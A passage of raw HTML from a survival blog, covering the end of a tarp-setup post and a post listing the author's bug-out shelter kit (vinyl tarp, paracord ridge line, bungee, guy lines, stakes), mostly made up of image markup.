data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502793289&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;200&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="15" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/15.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/15.jpg?w=497" class="aligncenter size-large wp-image-3269" src="https://sensiblesurvival.files.wordpress.com/2017/10/15.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/15.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/10/15.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/10/15.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/10/15.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/10/15.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>That’s it.  You’re ready to move in for a good night’s sleep, and the next morning you can break camp as quick as you set it up.</p> <p><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/16-10/" rel="attachment wp-att-3270"><img data-attachment-id="3270" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/16-10/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/16.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502793340&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="16" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/16.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/16.jpg?w=497" class="aligncenter size-large wp-image-3270" src="https://sensiblesurvival.files.wordpress.com/2017/10/16.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/16.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2017/10/16.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2017/10/16.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2017/10/16.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2017/10/16.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/17-9/" rel="attachment wp-att-3271"><img data-attachment-id="3271" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/17-9/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/17.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502793642&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="17" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/17.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/17.jpg?w=497" class="aligncenter size-large wp-image-3271" src="https://sensiblesurvival.files.wordpress.com/2017/10/17.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/17.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2017/10/17.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2017/10/17.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2017/10/17.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2017/10/17.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>&nbsp;</p> </div><!--end entry--> <div class="post-footer"> <div class="comments"> <a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/#respond">Leave a Comment</a> </div><!-- .comments --> </div><!--end post footer--> </div><!--end post--> <div id="post-3235" class="post-3235 post type-post status-publish format-standard hentry category-bug-out-bags-and-survival-kits tag-bug-out-tarp tag-bug-out-shelter tag-light-weight-shelter tag-survival-shelter tag-tarp-kit tag-vinyl-tarp-kit"> <div class="post-header"> <div class="date"><a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/">September 13, 2017</a></div> <h2><a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/" rel="bookmark" title="Permanent Link to My Bug-Out Shelter&nbsp;Kit">My Bug-Out Shelter&nbsp;Kit</a></h2> <div class="author"> </div> </div><!--end post header--> <div class="entry clear"> <p>When some people are camping they like to be in a tent; other people like to sleep in the open or under a tarp.  I am in the later group.  If the weather is nice, I like to sleep in a hammock or a sleeping bag and bivy sack under the stars.  If the weather is threatening rain or if it is cold; I like to sleep under a tarp.  There are several reasons that I prefer a tarp.  For one, tarps are very light to carry.  My tarp set-up including lines, stakes, etc. weighs 3 lbs. 10 oz.(that’s about 1.65 kilos for my non-American friends).  For another thing, a tarp is very versatile as far as different set-ups.  A tarp can be set up to take advantage of a fire for additional heat in the winter, and it can be suspended overhead to allow better air circulation in the summer.  A tarp also allows better exterior visibility than a tent.  And lastly, a tarp can be used in conjunction with a hammock, something that is not possible with your average tent.</p> <p>I’m going to do a couple of posts on my favorite tarp set-ups; but before I do that, I thought it might be good to show you my bug-out tarp kit.  Some might say that I include too much in my kit.  Some of the items could be foraged or manufactured in the wild.  This is true.  You could, in fact, build your entire shelter from foraged materials, and I encourage you learn how to do just that.  But, everything about survival is a trade-off.  You have to constantly be thinking about how much space you have in your pack, the weight of items that you carry, the time necessary to locate and/or make items in the wild, and the calories burned carrying items as opposed to the calories burned making items.  I consider the small amount of added weight in my kit to be negligible compared to the time and calories used to do things like cutting tent stakes.  My whole tarp kit weighs three pounds and ten ounces and rolls up into a nice 24” by 6” bundle.<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/02-22/" rel="attachment wp-att-3236"><img data-attachment-id="3236" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/02-22/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/02.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504365942&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.066666666666667&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="02" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/02.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/02.jpg?w=497" class="aligncenter size-large wp-image-3236" src="https://sensiblesurvival.files.wordpress.com/2017/09/02.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/02.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/02.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/02.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/02.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/02.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Using the items in this kit I can make my three favorite tarp set-ups without any additional materials. So anyhow, this is what’s in my kit.</p> <p>Item number one is my tarp.  It is an inexpensive vinyl tarp that you can get at Harbor Freight or Wal-Mart.  The tarp is about eight by ten feet.  I used tarps like this for several years; but I recently modified it, as outlined in the previous two posts, by painting the inside with reflective aluminum paint, and I have added a center loop to the outside.<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/03-24/" rel="attachment wp-att-3237"><img data-attachment-id="3237" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/03-24/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/03.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;5.6&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1501318777&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.0025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="03" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/03.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/03.jpg?w=497" class="aligncenter size-large wp-image-3237" src="https://sensiblesurvival.files.wordpress.com/2017/09/03.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/03.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/03.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/03.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/03.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/03.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/03a-2/" rel="attachment wp-att-3238"><img data-attachment-id="3238" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/03a-2/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/03a.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502800563&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.076923076923077&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="03a" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/03a.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/03a.jpg?w=497" class="aligncenter size-large wp-image-3238" src="https://sensiblesurvival.files.wordpress.com/2017/09/03a.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/03a.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/03a.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/03a.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/03a.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/03a.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Some set-ups require a ridge line.  I carry a twenty-five foot piece of 550 para-cord to use as a ridge line.  It has permanent loop tied into one end.  The ends of all of my cords have been melted to prevent fraying.  Be sure that you use good, military grade para-cord, not the cheap stuff from the craft store.<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/04-ridgeline/" rel="attachment wp-att-3239"><img data-attachment-id="3239" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/04-ridgeline/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgeline.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366409&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.05&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="04 ridgeline" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgeline.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgeline.jpg?w=497" class="aligncenter size-large wp-image-3239" src="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgeline.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgeline.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgeline.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgeline.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgeline.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgeline.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/04-ridgelineloop/" rel="attachment wp-att-3240"><img data-attachment-id="3240" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/04-ridgelineloop/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgelineloop.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366331&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.066666666666667&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="04 ridgelineloop" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgelineloop.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgelineloop.jpg?w=497" class="aligncenter size-large wp-image-3240" src="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgelineloop.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgelineloop.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgelineloop.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgelineloop.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgelineloop.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/04-ridgelineloop.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>A 40 inch long bungee cord is handy for quickly setting up plow-point shelters (more on that in the next post).<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/05-bungee/" rel="attachment wp-att-3241"><img data-attachment-id="3241" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/05-bungee/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/05-bungee.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366498&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.05&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="05 bungee" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/05-bungee.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/05-bungee.jpg?w=497" class="aligncenter size-large wp-image-3241" src="https://sensiblesurvival.files.wordpress.com/2017/09/05-bungee.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/05-bungee.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/05-bungee.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/05-bungee.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/05-bungee.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/05-bungee.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>I carry eight guy lines that come in handy for some set-ups.  Each guy line is six feet long with a permanent loop in one end.<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/07-guyline/" rel="attachment wp-att-3243"><img data-attachment-id="3243" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/07-guyline/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/07-guyline.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366325&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.05&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="07 guyline" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/07-guyline.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/07-guyline.jpg?w=497" class="aligncenter size-large wp-image-3243" src="https://sensiblesurvival.files.wordpress.com/2017/09/07-guyline.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/07-guyline.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/07-guyline.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/07-guyline.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/07-guyline.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/07-guyline.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/06-guylines/" rel="attachment wp-att-3242"><img data-attachment-id="3242" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/06-guylines/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/06-guylines.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366263&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.05&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="06 guylines" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/06-guylines.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/06-guylines.jpg?w=497" class="aligncenter size-large wp-image-3242" src="https://sensiblesurvival.files.wordpress.com/2017/09/06-guylines.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/06-guylines.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/06-guylines.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/06-guylines.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/06-guylines.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/06-guylines.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>My kit includes eight tent stakes.  Two on them are about eleven inches long and made of steel.  <a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/08-long-stakes/" rel="attachment wp-att-3244"><img data-attachment-id="3244" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/08-long-stakes/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/08-long-stakes.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366159&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.05&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="08 long stakes" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/08-long-stakes.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/08-long-stakes.jpg?w=497" class="aligncenter size-large wp-image-3244" src="https://sensiblesurvival.files.wordpress.com/2017/09/08-long-stakes.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/08-long-stakes.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/08-long-stakes.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/08-long-stakes.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/08-long-stakes.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/08-long-stakes.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>The other six are seven inches long and made of aluminum.  These are actually aluminum nails that are used to hang rain gutters.  You can buy them at the hardware store for about fifty cents each.  <a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/08-short-stakes/" rel="attachment wp-att-3245"><img data-attachment-id="3245" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/08-short-stakes/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/08-short-stakes.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366207&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.05&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="08 short stakes" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/08-short-stakes.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/08-short-stakes.jpg?w=497" class="aligncenter size-large wp-image-3245" src="https://sensiblesurvival.files.wordpress.com/2017/09/08-short-stakes.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/08-short-stakes.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/08-short-stakes.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/08-short-stakes.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/08-short-stakes.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/08-short-stakes.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/09-short-stake/" rel="attachment wp-att-3246"><img data-attachment-id="3246" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/09-short-stake/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/09-short-stake.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366225&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.04&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="09 short stake" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/09-short-stake.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/09-short-stake.jpg?w=497" class="aligncenter size-large wp-image-3246" src="https://sensiblesurvival.files.wordpress.com/2017/09/09-short-stake.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/09-short-stake.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/09-short-stake.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/09-short-stake.jpg?w=150&amp;h=106 150w, https://sensiblesurvival.files.wordpress.com/2017/09/09-short-stake.jpg?w=300&amp;h=211 300w, https://sensiblesurvival.files.wordpress.com/2017/09/09-short-stake.jpg?w=768&amp;h=540 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>I keep them bundled together with one of those thread covered rubber hair bands.<a href="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/10-stake-bundle/" rel="attachment wp-att-3247"><img data-attachment-id="3247" data-permalink="https://sensiblesurvival.org/2017/09/13/my-bug-out-shelter-kit/10-stake-bundle/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/09/10-stake-bundle.jpg" data-orig-size="2592,1824" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1504366108&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;400&quot;,&quot;shutter_speed&quot;:&quot;0.05&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="10 stake bundle" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/09/10-stake-bundle.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/09/10-stake-bundle.jpg?w=497" class="aligncenter size-large wp-image-3247" src="https://sensiblesurvival.files.wordpress.com/2017/09/10-stake-bundle.jpg?w=497&#038;h=350" alt="" width="497" height="350" srcset="https://sensiblesurvival.files.wordpress.com/2017/09/10-stake-bundle.jpg?w=497&amp;h=350 497w, https://sensiblesurvival.files.wordpress.com/2017/09/10-stake-bundle.jpg?w=994&amp;h=700 994w, https://sensiblesurvival.files.wordpress.com/2017/09/10-stake-bundle.jpg?w=150&amp;h=106 150w, 